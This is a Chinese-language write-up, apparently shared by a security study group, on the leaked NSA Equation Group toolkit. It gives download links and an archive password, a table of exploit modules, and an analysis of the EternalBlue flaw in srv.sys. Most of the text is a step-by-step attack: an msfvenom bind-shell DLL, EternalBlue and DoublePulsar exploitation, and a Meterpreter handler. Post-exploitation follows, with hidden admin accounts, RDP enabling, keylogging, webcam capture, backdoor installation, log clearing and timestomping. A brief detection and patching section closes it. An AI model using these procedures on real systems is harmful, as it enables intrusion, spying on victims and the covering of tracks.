NSA方程式工具利用與分析
前陣子Shadow Brokers洩露了NSA的一批駭客工具包,引起了一場網路大地震,其中包含了多個Windows 遠端漏洞利用工具,覆蓋了全球
70% 的 Windows 伺服器,包括Windows NT、Windows 2000、Windows XP、Windows
2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008
R2、Windows Server 2012 SP0,任何人都可以直接下載並遠端攻擊利用。
下載地址
:
https://
yadi。sk/d/NJqzpqo_3GxZA
4
解壓密碼
:Reeeeeeeeeeeeeee
github下載地址
:
https://
github。com/misterch0c/s
hadowbroker
釋放的工具總共包含三個資料夾,
Swift:包含了NSA對SWIFT銀行系統發動攻擊的相關證據,其中有EastNets的一些PPT文件、相關的證據、一些登入憑證和內部架構,EastNets是中東最大的SWIFT服務機構之一。
OddJob:包含一個基於Windows的植入軟體,幷包括所指定的配置檔案和payload。適用於Windows Server 2003 Enterprise(甚至Windows XP Professional)
Windows:包含對Windows作業系統的許多駭客工具,但主要針對的是較舊版本的Windows(Windows XP中)和Server 2003。
主要工具
FUZZBUNCH
:一款類似Metasploit的Exploit框架
模組==>
漏洞
==>影響系統
==>預設埠
Easypi ==> IBM Lotus Notes漏洞==>Windows NT, 2000 ,XP, 2003==>3264
Easybee ==>
MDaemon WorldClient電子郵件伺服器漏洞 ==>
WorldClient 9。5, 9。6, 10。0, 10。1
Eternalblue ==>
SMBv2漏洞(MS17-010) ==>
Windows XP(32),Windows Server 2008 R2(32/64),Windows 7(32/64) ==>
139/445
Doublepulsar ==>
SMB和NBT漏洞
Windows XP(32), Vista, 7, Windows Server 2003, 2008, 2008 R2 ==>
139/445
Eternalromance ==>
SMBv1漏洞(MS17-010)和 NBT漏洞 ==>
Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2 ==>
139/445
Eternalchampion ==> SMB和NBT漏洞 ==>
Windows XP, Vista, 7, Windows Server 2003, 2008, 2008 R2, 2012, Windows 8 SP0 ==>
139/445
Eternalsynergy ==>
SMB和NBT漏洞 ==>
Windows 8, Windows Server 2012 ==>
139/445
Explodingcan ==>
IIS6。0遠端利用漏洞 ==>
Windows Server 2003 ==>
80
Emphasismine ==>
IMAP漏洞 ==>
IBM Lotus Domino 6。5。4, 6。5。5, 7。0, 8。0, 8。5 ==>
143
Ewokfrenzy ==>
IMAP漏洞 ==>
IBM Lotus Domino 6。5。4, 7。0。2
== >143
Englishmansdentist ==>
SMTP漏洞
==> ==>25
Erraticgopher ==>
RPC漏洞 ==>
Windows XP SP3, Windows 2003 ==>
445
Eskimoroll ==>
kerberos漏洞 ==>
Windows 2000, 2003, 2003 R2, 2008, 2008 R2 ==>
88
Eclipsedwing ==>
MS08-067漏洞 ==>
Windows 2000, XP, 2003 ==>
139/445
Educatedscholar ==>
MS09-050漏洞 ==>
Windows vista, 2008 ==>
445
Emeraldthread ==>
SMB和NBT漏洞 ==>
Windows XP, 2003 ==>
139/445
Zippybeer ==>
SMTP漏洞 ==> ==> 445
Esteemaudit ==>
RDP漏洞 ==>
Windows XP, Windows Server 2003 ==>
3389
ETERNALBLUE攻擊原理分析
ETERNALBLUE是一個RCE漏洞利用,透過SMB(Server Message Block)和NBT(NetBIOS over TCP/IP)影響Windows XP,Windows 2008 R2和Windows 7系統。
漏洞發生處:C:\Windows\System32\drivers\srv。sys (注:srv。sys是Windows系統驅動檔案,是微軟預設的信任檔案。
漏洞函式:unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2)
觸發點:_memmove(v5, (const void *)(a2 + 5 + *(_BYTE *)(a1 + 5)), *(_WORD *)(a1 + 6));
原因:邏輯不正確導致的越界寫入
官方補丁修復前:
int __fastcall SrvOs2FeaListSizeToNt(_DWORD *a1)
{
//SNIP。。。
while (v3 = v4 || (v7 = *(_BYTE *)(v3 + 1) + *(_WORD *)(v3 + 2), v7 + v3 + 5 >; v4))
{
*(WORD*)v6 = v3 - (_DWORD)v6; //<——————修改處
return v1;
}
//SNIP。。。
}
int __thiscall ExecuteTransaction(int this)
{
//SNIP。。。
if (*(_DWORD *)(v3 + 0x50) >;= 1) //<————修改處
{
_SrvSetSmbError2(0, 464, ";onecore\\base\\fs\\remotefs\\smb\\srv\\srv。downlevel\\smbtrans。c";);
SrvLogInvalidSmbDirect(v1, v10);
goto LABEL_109;
}
//SNIP。。。
}
修復後:
int __fastcall SrvOs2FeaListSizeToNt(_DWORD *a1)
{
//SNIP。。。
while (v3 = v4 || (v7 = *(_BYTE *)(v3 + 1) + *(_WORD *)(v3 + 2), v7 + v3 + 5 >; v4))
{
*(DWORD*)v6 = v3 - (_DWORD)v6; //<————修改處
return v1;
}
//SNIP。。。
}
int __thiscall ExecuteTransaction(int this)
{
//SNIP。。。
if (*(_DWORD *)(v3 + 0x50) >;= 2u) //<————修改處
{
_SrvSetSmbError2(0, 464, ";onecore\\base\\fs\\remotefs\\smb\\srv\\srv。downlevel\\smbtrans。c";);
SrvLogInvalidSmbDirect(v1, v10);
goto LABEL_109;
}
//SNIP。。。
}
具體見參考資料5
漏洞復現
環境搭建
主機型別
OS
IP
攻擊機1
win2003
10。10。10。130
攻擊機2
kali linux 2。0
10。10。10。128
靶機
winXP x86
10。10。10。129
工具準備
解壓NSA工具包中的windows資料夾到攻擊機1的C:\目錄下(只要不是中文目錄皆可);
在攻擊機1安裝:
python-2。6。6。msi
pywin32-221。win32-py2。6。exe
在攻擊機2先生成用於回連的dll
msfvenom -p windows/meterpreter/bind_tcp LPORT=5555 -f dll > x86bind。dll
3。掃描開啟445埠的活躍主機並探測作業系統
nmap -Pn -p445 -O 10。10。10。0/24
nmap -Pn -p445 -O -iL ip。txt
4。攻擊機1開始利用ETERNALBLUE攻擊
python fb。py
use Eternalblue 。。。
5。利用Doublepulsar注入dll
use Doublepulsar
6。kali攻擊機利用msf回連控制主機5555埠
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set LPORT 5555
set RHOST XXX。XXX。XXX。XXX
exploit
後滲透攻擊
開3389埠
wmic /namespace:\root\cimv2\terminalservices path
win32_terminalservicesetting where (__CLASS != “”) call
setallowtsconnections 1
wmic /namespace:\root\cimv2\terminalservices path
win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call
setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
針對win XP及win2003只需要第3條命令
針對win 7需要第1,2條命令
針對win 2012需要3條命令
新增賬戶進管理組
net user [username] [password] /add
net localgroup Administrators [username] /add
埠轉發
如果3389埠只限內網訪問,可以使用portfwd將埠轉發到本地連線
portfwd add -l 4444 -p 3389 -r XXX。XXX。XXX。XXX
rdesktop -u root -p toor 127。0。0。1:4444
meterpreter自帶的多功能shell
hashdump:獲取使用者密碼雜湊值,可以用ophcrack等彩虹表工具進行破解明文
screenshot:獲取螢幕截圖
webcam_snap:調取對方攝像頭拍照
keyscan_start,keyscan_dump:記錄鍵盤動作
ps:檢視當前執行程序
sysinfo:檢視系統資訊
getsystem:提權
維持控制
migrate:將meterpreter會話移至另一個程序記憶體空間(migrate pid)配合ps使用
irb:與ruby終端互動,呼叫meterpreter封裝函式,可以新增Railgun元件直接互動本地的Windows API,阻止目標主機進入睡眠狀態
irb client。core。use(“railgun) client。railgun。kernel32。SetThreadExecutionState(”ES_CONTINUOUS|ES_SYSTEM_REQUIRED“)
background:隱藏在後臺方便msf終端進行其他操作,session檢視對話id
session -i X:使用已經成功獲取的對話
植入後門
測試是否虛擬機器:
run post/windows/gather/checkvm
以系統服務形式安裝:在目標主機的31337埠開啟監聽,使用metsvc。exe安裝metsvc-server。exe服務,執行時載入
metsrv。dll
run metsvc
getgui開啟遠端桌面:
run getgui -u sherlly -p sherlly
run multi_console_command -rc /root/。msf3/logs/scripts/getgui/clean_up_XXX。rc //清除痕跡,關閉服務,刪除新增賬號
清除入侵痕跡
clearev:清除日誌
timestomp:修改檔案的建立時間,最後寫入和最後訪問時間
timestomp xiugai。doc -f old。doc
檢測&防禦
國外有人寫了個檢測Doublepulsar入侵的指令碼,執行環境需要python2。6, 地址countercept/doublepulsar-detection-script,使用方法
python detect_doublepulsar_smb。py ——ip XXX。XXX。XXX。XXX
python detect_doublepulsar_rdp。py ——file ips。list ——verbose ——threads 1
另外,nmap也基於該指令碼出了對應掃描指令碼smb-double-pulsar-backdoor。nse,使用方法
nmap -p 445
安裝相應補丁Protecting customers and evaluating risk
如非必要,關閉25, 88, 139, 445, 3389埠
使用防火牆、或者安全組配置安全策略,遮蔽對包括445、3389在內的系統埠訪問。(見參考資料7)
參考
Latest Hacking Tools Leak Indicates NSA Was Targeting SWIFT Banking Network
ShadowBrokers方程式工具包淺析,揭秘方程式組織工具包的前世今生 - FreeBuf。COM | 關注駭客與極客
Leaked NSA hacking tools are a hit on the dark web - CyberScoop
srv。sys Windows process - What is it?
NSA Eternalblue SMB 漏洞分析
smb-double-pulsar-backdoor NSE Script
如何設定Windows 7 防火牆埠規則
======================================================================
本文來源於我們小組學習交流分享資料Xp0int/Xp0int_share_weekly,原作者:sherlly